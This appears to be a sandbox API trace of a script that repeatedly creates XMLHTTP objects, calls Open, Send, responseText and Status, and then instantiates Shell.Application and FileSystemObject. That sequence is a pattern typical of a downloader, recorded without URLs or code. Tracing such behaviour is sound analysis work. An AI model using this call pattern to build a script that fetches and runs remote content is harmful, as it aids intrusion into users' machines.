	[0601.295] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0601.296] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c30, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0601.296] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c30, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0601.296] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0601.296] SysStringLen (param_1=0x0) returned 0x0
	[0601.296] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0601.296] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0601.296] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7520) returned 0x0
	[0601.296] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0601.296] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b98) returned 0x0
	[0601.296] ??2@YAPEAX_K@Z () returned 0x62f310
	[0601.296] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b98, pUnkSite=0x62f310) 
	[0601.296] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0601.297] XMLHTTPRequest:IUnknown:Release (This=0x49c5b98) returned 0x0
	[0601.297] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7520) returned 0x0
	[0601.297] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7520) returned 0x3
	[0601.297] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0601.297] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7520, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0601.297] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0601.297] longjmp () 
	[0601.297] longjmp () 
	[0601.297] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0601.297] SysStringLen (param_1=0x0) returned 0x0
	[0601.298] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0601.298] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0601.298] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0601.298] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0601.298] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0601.298] ??2@YAPEAX_K@Z () returned 0x62f330
	[0601.298] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0601.298] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0601.298] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0601.298] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0601.298] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0601.298] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0601.299] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0601.299] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0601.299] longjmp () 
	[0601.299] longjmp () 
	[0601.299] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0601.299] SysStringLen (param_1=0x0) returned 0x0
	[0601.299] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0601.299] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0601.299] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5be0) returned 0x0
	[0601.299] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0601.299] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c48) returned 0x0
	[0601.300] ??2@YAPEAX_K@Z () returned 0x62f310
	[0601.300] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c48, pUnkSite=0x62f310) 
	[0601.300] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0601.300] XMLHTTPRequest:IUnknown:Release (This=0x49c5c48) returned 0x0
	[0601.300] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5be0) returned 0x0
	[0601.300] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5be0) returned 0x3
	[0601.300] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0601.300] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0601.300] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0601.300] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0601.300] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0601.301] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0602.702] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0602.702] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0602.702] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0602.702] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0602.703] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0602.703] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0602.703] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0602.703] SysStringLen (param_1=0x0) returned 0x0
	[0602.703] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0602.703] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0602.703] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0602.704] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0602.704] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0602.704] ??2@YAPEAX_K@Z () returned 0x62f350
	[0602.704] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0602.704] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0602.704] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0602.704] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0602.704] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0602.704] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0602.704] SysStringLen (param_1=0x0) returned 0x0
	[0602.704] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0602.707] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0602.707] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0602.707] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0602.707] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0602.707] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0602.707] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0604.074] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0604.075] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5be0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0604.075] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0604.076] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0604.076] SysStringLen (param_1=0x0) returned 0x0
	[0604.076] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0604.076] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0604.076] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5be0) returned 0x0
	[0604.076] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0604.076] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0604.076] ??2@YAPEAX_K@Z () returned 0x62f310
	[0604.076] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f310) 
	[0604.076] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0604.077] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0604.077] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5be0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5be0) returned 0x0
	[0604.077] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5be0) returned 0x3
